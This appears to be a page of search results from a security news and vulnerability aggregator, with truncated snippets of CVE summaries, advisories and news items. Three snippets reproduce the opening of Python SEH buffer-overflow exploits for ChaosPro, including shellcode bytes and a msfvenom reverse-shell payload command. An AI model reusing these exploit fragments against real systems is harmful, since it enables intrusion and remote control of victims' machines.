7736 matches found
Cross site scripting
Ogma CMS 0.5 has XSS via creation of a new blog...
CVE-2019-16661
Ogma CMS 0.5 has XSS via creation of a new blog...
CVE-2019-16661
CVE-2019-16661 affects Ogma CMS 0.5 and describes an XSS vulnerability that occurs during the creation of a new blog. The connected documents do not provide specifics on the exact vector, payload, affected components, root cause, or a published remediation. Therefore, the exact nature of the flaw...
Friday Squid Blogging: Piglet Squid
Another piglet squid video. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Chun brother technology blog team easy enterprise show integration 70C scene show source code system has SQL injection vulnerabilities
Chun brother technology blog team is committed to sharing station building technology, micro letter development technology, custom development business source code system, custom development enterprise website, is a service small and medium-sized webmaster enterprise technology-based independent...
Chun technical blog team easy enterprise show integration 70C scene show source code system has unauthorized access vulnerability
Chun brother technology blog team is committed to sharing station building technology, micro letter development technology, custom development business source code system, custom development enterprise website, is a service small and medium-sized webmaster enterprise technology-based independent...
CVE-2019-10073
The "Blog", "Forum", "Contact Us" screens of the template "ecommerce" application bundled in Apache OFBiz are weak to Stored XSS attacks. Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16.11: 1858438, 1858543, 1860595 and 1860616...
The Windows 10 Privacy Settings You Should Check Right Now
Whether you're new to Windows 10 or have been using it for years, take a minute to lock down your privacy...
Friday Squid Blogging: Squid Perfume
It's not perfume for squids. Nor is it perfume made from squids. It's a perfume called Squid, "inspired by life in the sea." As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Why 'Zero Day' Android Hacking Now Costs More Than iOS Attacks
Brokers of so-called zero day exploits are paying out more for Android than iOS—which would have been unthinkable until recently...
ChaosPro 3.1 SEH Buffer Overflow
!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...
ChaosPro 2.0 SEH Buffer Overflow
!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...
ChaosPro 2.1 - SEH Buffer Overflow
ChaosPro 2.1 - SEH Buffer Overflow !C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp...
BlockDev Sp. Z o.o: Wordpress users disclosure on blog.makerdao.con
Wordpress users disclosure on blog.makerdao.con...
A Hack to Steal a Tesla, a Yelp Overhaul, and More News
Catch up on the most important news from today in two minutes or less...
Beers with Talos Ep. #59: The tardy episode
Beers with Talos BWT Podcast episode No. 59 is now available. Download this episode and subscribe to Beers with Talos: If iTunes and Google Play aren't your thing, click here. Recorded 8/2/19 - Yes, I know what today’s date is. We got really busy last week and I am sorry that the podcast is late...
Microsoft Releases Security Updates to Address Remote Code Execution Vulnerabilities
Microsoft has released security updates to address two remote code execution vulnerabilities, CVE-2019-1181 and CVE-2019-1182, in the following operating systems: Windows 7 SP1 Windows Server 2008 R2 SP1 Windows Server 2012 Windows 8.1 Windows Server 2012 R2 Windows 10 Windows Server 2016 Windows...
CVE-2019-1181
creationtimestamp| type| source ---|---|--- 2019-08-13 05:00:00+00:00| seen| https://msrc.microsoft.com/blog/2019/08/patch-new-wormable-vulnerabilities-in-remote-desktop-services-cve-2019-1181-1182/ 2019-08-13 23:12:13+00:00| seen| https://t.me/cybershit/558 2019-08-14 04:00:00+00:00| seen|...
Simple 301 Redirects Addon Bulk Uploader <= 1.2.4 - Multiple Issues
Unauthenticated option changes vulnerability that could allow an attacker to redirect all pages and posts of the blog to a malicious website, as well as an authenticated options export/deletion vulnerability...
Friday Squid Blogging: Sinuous Asperoteuthis Mangoldae Squid
Great video of the Sinuous Asperoteuthis Mangoldae Squid. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...